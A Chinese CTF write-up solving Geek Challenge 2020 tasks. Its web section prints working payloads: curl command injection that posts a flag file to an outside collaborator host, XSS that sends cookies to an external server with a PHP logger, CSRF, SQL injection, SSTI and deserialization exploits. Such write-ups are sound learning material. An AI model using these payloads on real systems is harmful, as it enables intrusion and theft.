三叶草极客大挑战2020 部分题目Writeup

三叶草极客大挑战2020 部分题目Writeup

Web

Welcome

打开后状态码405，555555，然后看了一下报头存在请求错误，换成POST请求后，查看到源码

 <?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
header("HTTP/1.1 405 Method Not Allowed");
exit();
} else {
    if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){
        show_source(__FILE__);
    }
    else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){
        phpinfo();  // collect information from phpinfo!
    }
} 
Payload:POST:roam1[]=1&roam2[]=2

去phpinfo查看内容，发现存在f1444aagggg.php页面，打开又没内容，再去报文看看，返回包报头看到flag，为SYC{w31c0m3_t0_5yc_r0@m_php1}

flagshop

一开始不知道怎么做，然后群里管理员说修复了BOT，以为是存储型XSS的考点，然后尝试了几种方法都没作用。然后就去休息了，回来后发现给了hint，说了是CSRF的考点，没接触过，百度学习了一下，上个链接：https://juejin.im/post/6844903689702866952，看了一下应该是从提交报告让BOT转账给我们。

先用Burp构造一个CSRF的Poc，这里需要补充一句：

让他发送提交的作用。这里构造好后要放在VPS上，这里谢谢m3w师傅提供！

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://173.82.206.142:8005/transfer.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="target" value="atao" />
      <input type="hidden" name="money" value="10000" />
      <input type="hidden" name="messages" value="xxx" />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.forms[0].submit(); </script>
  </body>
</html>

有个验证码需要md5加密，写个脚本

#coding: utf-8
import hashlib
s = ''
dic = '0123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
md5 = hashlib.md5(dic).hexdigest()
for a in dic:
	for b in dic:
		for c in dic:
			for d in dic:
				t = str(a)+str(b)+str(c)+str(d)
				md5 = hashlib.md5(t).hexdigest()
				if md5[0:5] == 'b2156':
					print t
					print md5

提交的报告内容

<script>
    new Image().src = 'Payload的网址';
</script>

过一会儿就转钱过来了，然后购买flag即可，最后flag为SYC{cross_s1t3_r3q43st_4orgery_1s_44nny}

朋友的学妹

打开后提示为查看源码，通过查看获得注释内容，上面还有使用base64解码的字样，即解码注释内容获得flag，为SYC{F1@_4s_h4Lpfullllll}

EZwww

根据提示存在备份文件，尝试发现为www.zip，获得一个假的flag和源码，源码如下

<html>
 <head>
  <title>Lola's website1.0</title>
 </head>
 <body>
 <?php echo '<h1>welcome to my website</h1>'; ?>
 <?php echo '<p>i will never forget to backup my website......</p>'; ?>
 <?php echo '<img src="img/lola.gif" alt="welcome~"/>'; ?>
 </body>
</html>
<?php
$key1 = $_POST['a'];
$key2 = base64_decode('c3ljbDB2ZXI=');
if($key1 === $key2)
{
    //this is a true flag
echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>';
}
?>

通过POST请求a变量然后比较base64解码内容获得flag，Payload:POST:a=sycl0ver，获得flag为SYC{Backup_1s_4_good_h4bit_l0l}

EZgit

通过提示知道是使用GitHack获得源文件，但是源文件打开后得到的是flag is toooo old!，根据题目提示应该是版本的问题，通过命令git log查看，发现存在另一个版本有flag的，使用命令git diff 3796466675a1db323e42170def92bee71344a2ee进行对比，获得flag为SYC{I_l0ve_sycl0ver_l0l}

刘壮的黑页

进去后到最下面看到一段代码，GET请求传入username变量，POST请求传入passwd变量，两个变量分别等于admin和syclover获得flag

Payload:

GET:?username=admin

POST:passwd=syclover

flag为SYC{d0_y0u_k0nw_GET?}

我是大黑客

打开后看到存在.bak的文件，然后用蚁剑连接，根目录下存在flag，flag为SYC{1iuzHuang_yyd_G0d!}

ezbypass

打开后如下：

Please use a GET request to pass in the variables a and b, compare them with strcmp and let strcmp return a value of NULL.

Note that a and b cannot be equal.

传一个a和b不相等且strcmp后置空，一个等于数组就可以绕过了

接着是：

OKOK,You got the first step.

Please POST a variable c that is not a number to make it equal to 123

传入c=123，但不是数字，应该是弱比较

Payload:GET:?a=x&b[];POST:c=123e

flag为SYC{php_4s_so_funny}

知X堂的php教程

存在一个目录穿梭和一个读取文件两个页面

分别查看了两个文件，目录穿梭使用的是exec("ls $search_dir", $contents);，不是$contents = scandir($search_dir);，那可能命令执行的漏洞。

但是不知道flag在哪里，但是可以使用find / -name flag配合``反引号带出flag文件的位置

Payload:http://47.94.239.194:8082/listdir.php?dirname=;curl -X POST -F xx=@`find / -name flag` http://aesuim9gty25alcdnjqwy4tj2a80wp.burpcollaborator.net

Myblog

题目给出了提示：1.Do you know the PHP pseudo-protocol? 2.Every 5 minutes remove all upload files.

先找找与伪协议有关的内容，这里从url可以看出来，http://173.82.206.142:8006/index.php?page=home，后面home应该是存在漏洞的，是用伪协议进行读取，http://173.82.206.142:8006/index.php?page=php://filter/read=convert.base64-encode/resource=home

然后就是在登陆的地方获得一下源码，主要是验证的地方

admin/user.php(仅列出主要代码)

<?php
error_reporting(0);
session_start();
$logined = false;
if (isset($_POST['username']) and isset($_POST['password'])){
	if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password']){  // No one knows my password, including myself
		$logined = true;
		$_SESSION['status'] = $logined;
	}
}
if ($logined === false && !isset($_SESSION['status']) || $_SESSION['status'] !== true){
    echo "<script>alert('username or password not correct!');window.location.href='index.php?page=login';</script>";
	die();
}
?>

只需要验证对if ($_POST['username'] === "Longlone" and $_POST['password']==$_SESSION['password'])就可以登陆了，username很好实现，但是password和SESSION就不容易，但是置空的话就可以很轻易实现，完成登陆了。

接着从第二点提示可以看出，应该是文件上传的洞，找了一下发现只有上传头像的功能，那应该就是这里了，发现只能上传图片，最后解析成了图片，想到了文件包含，可以是用zip协议这类的，这里将php文件压缩后，更改后缀名，上传文件，然后访问?page=./路径+上传文件名%23压缩包中的文件名，即可。这里#一定要urlcode编码。

带恶人六撞

?id=1'
返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
判断存在sql报错注入
先尝试
?id=1 and (updatexml(1,concat(0x7e,(select database()),0x7e),1))
返回
hacker?
再试试别的报错函数,这里想到了上一届极客大挑战的extractvalue函数，这里用^进行连接
?id=1'^extractvalue(1,concat(0x7e,(select(database()))))%23
返回
XPATH syntax error: '~geek_sql'
然后查看表名
?id=1'^extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='geek_sql')))%23
返回
XPATH syntax error: '~blog,fllllag'
查看列名
?id=1'^extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='fllllag')))%23
返回
XPATH syntax error: '~id,fllllllag'
查看fllllag表中的fllllllag列
?id=1'^extractvalue(1,concat(0x7e,(select group_concat(fllllllag) from fllllag)))%23
返回
XPATH syntax error: '~welcome_to_syclover,longlone_ne'
好像没有回显全部内容，应该是extractvalue函数存在回显长度，配合limit回显每一行的内容
?id=1'^extractvalue(1,concat(0x7e,(select fllllllag from fllllag limit 2,1)))%23
返回
XPATH syntax error: '~SYC{liuzhuang_4s_@_G00d_m@n}'

告白网站

打开后是一个留言网站，测试了一下只有留言功能，想到了XSS，不过存在过滤，手工测试了一下过滤了"."、"%"、"&"、"="，这个验证机制真是要人命，百度了一圈都没有结果。后来看到了JSfuck，这个好像就是为了防止xss中被waf过滤出现的。

new Image().src="http://xxx.xxx.xxx.xxx/atao/test.php?cookie="+document.cookie;

将上面的内容通过jsfuck加密，然后用<script></script>框起来，发送，过一会儿就可以看到flag了。

IP: 101.132.140.4Date: 2020-11-05 3:08:56 Cookie:PHPSESSID=8fc34c9e3b713a9363d7db177468571e; cookie=SYC{This_iS_your_gift!!!!}

本来是想用XSS平台做的，但是一直没成功，感觉是自己太菜了不会用，因为只会用上面给的代码，然后借了Firebasky师傅vps用写了个php，代码如下：

<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>

pop chain epic

源码如下：

<?php
class pop
{
    public $aaa;
    public static $bbb = false;
    public function __wakeup()
    {
        //Do you know CVE?
        echo "The class pop should never be serialized.";
        $this->aaa = NULL;
    }
    public function __destruct()
    {
        for ($i=0; $i<2; $i++) {
            if (self::$bbb) {
                $this->aaa[1]($this->aaa[2]);
            } else {
                self::$bbb = call_user_func($this->aaa["object"]);
            }
        }
    }
}
class chain
{
    private $AFKL;
    protected function getAFKL()
    {
        return $this->AFKL;
    }
}
class epic extends chain
{
    public $aaa;
    public static $bbb = false;
    public function __invoke()
    {
        return self::$bbb;
    }
    public function __call($name, $params)
    {
        return $this->aaa->$name($params);
    }
}
if (isset($_GET["code"])) {
    unserialize(base64_decode($_GET["code"]));
} else {
    highlight_file(__FILE__);
}

很有趣的一道题目，被带着一直走，思路没对，一直以为要和下面那个继承类的东西合在一起，然后输出AFKL的值，一开始看到__invoke()魔术方法，感觉很开心，然后测试后发现不行，因为epic类中的bbb也是静态的false，所以调用函数后，pop类中的bbb还是false，所以这里应该是要调用函数，然后取执行$this->aaa[1]($this->aaa[2])，这个也可以从for循环中看出来，因为for循环只做两次，说明第一次去了回调函数，第二次应该不是去回调函数了。有了接下来的一段php代码

<?php
class pop
{
    public $aaa;
    public static $bbb = false;
}
class chain
{
    private $AFKL;
    protected function getAFKL()
    {
        return $this->AFKL;
    }
}
class epic extends chain
{
    public $aaa;
    public static $bbb = false;
}
$a = new pop();
$a->$aaa = array('object'=>'phpinfo',1=>'echo',2=>'getAFKL');
object(pop)#1 (2) {
  ["aaa"]=>
  NULL
  [""]=>
  array(3) {
    ["object"]=>
    string(7) "phpinfo"
    [1]=>
    string(4) "echo"
    [2]=>
    string(7) "getAFKL"
  }
}

这段代码存在一个最致命的错误，就是$a->$aaa，这个本来是想对aaa变量进行赋值的，但是前面写了$，所以这里出来的类会存在两个变量，然后因为我一直没看类的亚子，所以这里卡成一个傻逼。不过以后也要记住对于类中的变量的赋值！！！

<?php
error_reporting(0);
class pop
{
    public $aaa;
    public static $bbb = false;
}
$a = new pop();
$a->aaa = array('object'=>'phpinfo',1=>'system',2=>'cat /flag');
echo base64_encode(str_replace(":1:",":2:",serialize($a)));

X迪的pyp语言

​ 打开网站后是一个登陆框，查看一下源码发现了，访问后获得了网站的源码，如下：

import re
from flask import Flask, render_template_string, request
import templates.templates as tp
app = Flask(__name__)
def isParamLegal(param):
    return (re.search(r'{{.*}}|{%.*%}', param, re.M|re.S) is None)
@app.route('/')
@app.route('/index.php')
def main():
    indexTp = tp.head + tp.index + tp.foot
    return render_template_string(indexTp)
@app.route('/login.php', methods=["POST"])
def login():
    username = request.form.get('username')
    password = request.form.get('password')
    if(isParamLegal(username) and isParamLegal(password)):
        message = "Username:" + username + "&" + "Password:" + password
    else:
        message = "参数不合法"
    loginTmpTp = tp.head + tp.login + tp.foot
    loginTp = loginTmpTp % message
    return render_template_string(loginTp)
@app.route("/hint.php")
def hint():
    with open(__file__, "rb") as f:
        file = f.read()
    return file
if __name__ == '__main__':
    app.run(host="0.0.0.0")

考点知道了是SSTI，但是需要构造，不过存在一个自定义函数，对于单个username或者password进行了限制，不能单个构造出{{ }}或者{% %}这样的内容，但是通过观察，从message下手依旧是可以的，将"{{"和"}}"分别给username和password变量。构造如下：

username = "{{'"
password = "'.__class__}}"
message = "Username:" + username + "&" + "Password:" + password
print message
#返回
Username:{{'&Password:'.__class__}}
#在网站上测试返回
Username:<class 'str'>
#由于没啥过滤很容就可以获得flag了
Payload:
username={{'
password='.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']("cat flag").read()}}

Longlone_Secret1

​ 访问网址，没看出来有啥内容，F12查看源码获得：，GET请求传入name变量后获得源码，如下

from flask import Flask, request
import base64
import pickle
import io
import sys
import secret
app = Flask(__name__)
class YourSecret:
    def __init__(self, name):
        self.name = name
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__': #只允许__main__模块（白名单）
            return getattr(sys.modules['__main__'], name) #返回对象属性值
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))
def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()
@app.route('/')
def start():
    if request.args.get('name'):
        text = open(__file__, 'r', encoding='utf-8').read()
        return text
    else:
        return "我之前听说Longlone深藏着一个秘密，但是今天他居然跟我说他把这个秘密藏在了一个地方，如果我可以找到的话，他就会给我一些奖励。<br>"\
               "<br>但是他和我说要按他说的规矩来：必须凑够两个人才能开始游戏，那么，你愿意和我一起来吗？<br>"\
               "<br>你说你愿意？那真的太好了，那么，在开始之前，告诉我你的名字吧！<br>"\
               "<!-- Let me GET your name, so we can get started. -->"\
@app.route('/secret', methods=['GET', 'POST'])
def eql():
    if request.method == 'POST':  #POST请求才可以继续做
        try:
            data = base64.b64decode(request.form.get('secret')) #传入的secret变量进行base64解码
            if b'R' in data: #opcode代码中不能存在"R"字符，opcode中经常使用通过R指令码进行命令执行
                return "嗯？还想开挂？小心把你关进神仙服！"
            else:
                ser_data = restricted_loads(data) #进行pickle.loads反序列化
            if type(ser_data) is not YourSecret: #反序列化后的ser_data应该要属于YourSecret类
                return 'Are U sure this is longlone\'s secret?'
            if ser_data.name == YourSecret(secret.name).name: #这里需要反序列化中的name等于secret类中的name值
                return secret.flag #即可获得flag
            else:
                return 'The secret is incorrect!'
        except Exception as e:
            return repr(e) + '<br/>What do U want to do?'
    else:
        return "相信你也看到Longlone给我们的提示了，那么你能猜出他的秘密是什么吗？<br>"
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

​ 重点代码是/secret路由，分析写在上面了，这里能想到的方式有两种：1)变量赋值，即在传入反序列化字符串时，就让name=secret.name，但是这里多加了一个限制，修改了pickle.Unpickler.find_class()这个函数，使得我们要调用secret.name时会报错：_pickle.UnpicklingError: global 'secret.name' is forbidden，所以这里使用不了这个方法；2)变量覆盖，通过GLOBAL指令引入的变量，可以看作是原变量的引用。当在栈上修改它的值时，也会导致原变量也被修改，这里这主要就是利用了这个方法，原理的话之后会有一篇文章专门总结的。

Payload:secret=gANjX19tYWluX18Kc2VjcmV0Cn0oVm5hbWUKVmFkbWluCnViMGNfX21haW5fXwpZb3VyU2VjcmV0CimBfShYBAAAAG5hbWVYBQAAAGFkbWludWIu
转成opcode编码
\x80\x03c__main__\nsecret\n}(Vname\nVadmin\nub0c__main__\nYourSecret\n)\x81}(X\x04\x00\x00\x00nameX\x05\x00\x00\x00adminub.
简单的Payload:b"c__main__\nsecret\n}(S'name'\nS'xxx'\nub0(i__main__\nYourSecret\n(dS'name'\nS'xxx'\nsb."
使用的方式是变量覆盖，RestrictedUnpickler.find_class方法可以返回对象属性值，其中操作符c可以调用该方法，则有了c__main__\nsecret\n；模块__dict__属性是可以进行修改的，构造一个字典来修改对应键为什么值，构造通过}(S'name'\nS'xxx'\nu完成，然后使用b指令修改__dict__；最后使用0指令将它弹出栈；后接一个YouSecret类转成opcode字符串即可。

Cry

二战情报员刘壮

使用的是摩斯电码，flag为SYC{L1UZHU4NGIZ1Y1}

铠甲与萨满

使用的是凯撒密码，flag为SYC{liuzhuangliuzhuang_bangbangbang}

Misc

一“页”障目

将海报上的字符拼起来即可

壮言壮语

看到了佛曰，为与佛论禅，通过在线网站解码http://www.keyfc.net/bbs/tools/tudoucode.aspx，获得flag为SYC{i_l0ve_Japanese_wife}

Re

No RE no gain

使用IDA打开后，在main函数（不用F5伪代码）中直接看到flag

我真不会写驱动！

应该是非预期了，IDA打开后在sub_140001010函数直接看到flag，flag为SYC{First_Win64_DRIVER}

re00

题目提示了简单的异或，先看看主函数有没有东西，发现了：if ( (char)(buf[i] ^ 0x44) != byte_4060[i] )，异或的点找到了，然后根据上面的内容buf[i]是输入的字符串，所以要去看byte_4060[i]的内容，查看byte_4060获得下面的内容

char byte_4060[32]
.data:0000000000004060 byte_4060       db 17h, 1Dh, 7, 3Fh, 37h, 2Dh, 29h, 34h, 28h, 21h, 1Bh
.data:0000000000004060                                         ; DATA XREF: main+93↑o
.data:0000000000004060                 db 37h, 2Dh, 29h, 34h, 28h, 21h, 1Bh, 3Ch, 2Bh, 3 dup(36h)
.data:0000000000004060                 db 1Bh, 36h, 2Dh, 23h, 2Ch, 30h, 2 dup(7Bh), 39h
//n dup(m)的意思为n个m

将内容和0x44异或获得flag，脚本如下

a =[0x17, 0x1D, 0x7, 0x3F, 0x37, 0x2D, 0x29, 0x34, 0x28, 0x21, 0x1B,0x37, 0x2D, 0x29, 0x34, 0x28, 0x21, 0x1B, 0x3C, 0x2B, 0x36,0x36,0x36,0x1B, 0x36, 0x2D, 0x23, 0x2C, 0x30, 0x7B, 0x7B, 0x39]
b = 0x44
flag = ''
for i in a:
    flag =flag + chr(i ^ b)
print flag

flag为SYC{simple_simple_xorrr_right??}

PWN

数学咋样？

先用nc连接看看，看到如下

------------------------------------------
Can you help me to solve my math problem?
------------------------------------------
I have 20 tests
![0]  num_1 = 180, num_2 = 428
I can't calculate the expression 'num_1 + num_2'.
input your answer:

是一个加法，要循环20次就可以获得flag了，这里可以直接计算20次加法，也可以使用脚本，按照提示应该是要用脚本的。刚好上半年学了一点Pwn，这里用一下。脚本如下

import re
from pwn import *
p = remote('81.69.0.47',1111)
p.recvline()
p.recvline()
p.recvline()
for i in range(0,20):
    put1 = p.recvline()
    put = p.recvline()
    calc1 = re.search(r'num_1 = (.*),',put).group().replace('num_1 = ','').replace(',','')
    calc2 = re.search(r'num_2 = (.*)\n',put).group().replace('num_2 = ','').replace('\n','')
    #print calc1
    #print calc2
    s = str(eval(calc1+'+'+calc2))
    #print s
    p.recvline()
    put2 = p.recvn(18)
    p.sendline(s)
while True:
    strr = p.recvline()
    print strr
    if "SYC" in strr:
        break

Pwntools库的一些常用函数
本地打开：p=process('./filename')
远程打开：p=remote('ip地址',端口)
发送payload
1）p.send(payload)发生payload
2）p.sendline(payload)发送payload，并进行换行（末尾\n）
3）p.sendfter(some_string,payload)接收到some_string后，发送你的payload
接收返回内容
4）p.recvn(N)接受N个字符
5）p.recvline()接收一行输出
6）p.recvline(N)接收N行输出
7）p.recvuntil(some_string)接收到some_string为止

本文作者：erR0Ratao

本文链接：https://www.cnblogs.com/erR0Ratao/p/14023017.html